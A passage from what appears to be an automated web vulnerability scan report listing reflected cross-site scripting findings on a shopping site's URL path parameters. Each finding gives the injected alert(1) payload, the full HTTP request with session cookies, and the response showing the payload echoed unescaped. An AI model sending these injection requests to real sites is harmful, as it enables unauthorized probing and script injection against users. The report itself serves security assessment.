This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings2acdd'-alert(1)-'35281a32492/4120758082/Bedroom-Accessories/51 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:20:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishings2acdd'-alert(1)-'35281a32492/4120758082/Bedroom-Accessories/51';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.992. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e48f2<script>alert(1)</script>1528d971188 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishingse48f2<script>alert(1)</script>1528d971188/4120758082/Bedroom-Accessories/51 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:20:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishingse48f2<script>alert(1)</script>1528d971188 <a href="#" id="backlink">
...[SNIP]...

4.993. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c59d'-alert(1)-'fe6d4e8d198 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/41207580824c59d'-alert(1)-'fe6d4e8d198/Bedroom-Accessories/51 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:24:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/41207580824c59d'-alert(1)-'fe6d4e8d198/Bedroom-Accessories/51';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.994. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac591'-alert(1)-'ff1539429cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Bedroom-Accessoriesac591'-alert(1)-'ff1539429cf/51 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:30:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishings/4120758082/Bedroom-Accessoriesac591'-alert(1)-'ff1539429cf/51';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.995. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff205'-alert(1)-'52f1f141fae was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51ff205'-alert(1)-'52f1f141fae HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:34:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51ff205'-alert(1)-'52f1f141fae';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.996. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13dfe'-alert(1)-'6349041a10c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping13dfe'-alert(1)-'6349041a10c/Home-Furnishings/4120758082/China-Glassware/7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:27:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping13dfe'-alert(1)-'6349041a10c/Home-Furnishings/4120758082/China-Glassware/7';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.997. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6349e"><a>127442d98c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping6349e"><a>127442d98c4/Home-Furnishings/4120758082/China-Glassware/7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:16:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping6349e"><a>127442d98c4">
...[SNIP]...

4.998. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 662a8'-alert(1)-'0c55c544abd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings662a8'-alert(1)-'0c55c544abd/4120758082/China-Glassware/7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:33:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Home-Furnishings662a8'-alert(1)-'0c55c544abd/4120758082/China-Glassware/7';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.999. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dd353<script>alert(1)</script>6e43e896c14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishingsdd353<script>alert(1)</script>6e43e896c14/4120758082/China-Glassware/7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:34:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishingsdd353<script>alert(1)</script>6e43e896c14 <a href="#" id="backlink">
...[SNIP]...

4.1000. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6c80'-alert(1)-'c950948c136 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082d6c80'-alert(1)-'c950948c136/China-Glassware/7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:37:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082d6c80'-alert(1)-'c950948c136/China-Glassware/7';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1001. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33479'-alert(1)-'7c28f8dee98 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/China-Glassware33479'-alert(1)-'7c28f8dee98/7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:41:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082/China-Glassware33479'-alert(1)-'7c28f8dee98/7';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1002. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c8f8'-alert(1)-'6a945ffae2e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/China-Glassware/79c8f8'-alert(1)-'6a945ffae2e HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:44:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082/China-Glassware/79c8f8'-alert(1)-'6a945ffae2e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1003. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6f09'-alert(1)-'d4afe0e3fcb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppingf6f09'-alert(1)-'d4afe0e3fcb/Home-Furnishings/4120758082/Furniture-Rentals/9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:31:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shoppingf6f09'-alert(1)-'d4afe0e3fcb/Home-Furnishings/4120758082/Furniture-Rentals/9';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1004. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c433"><a>8c38f7750ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping3c433"><a>8c38f7750ca/Home-Furnishings/4120758082/Furniture-Rentals/9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
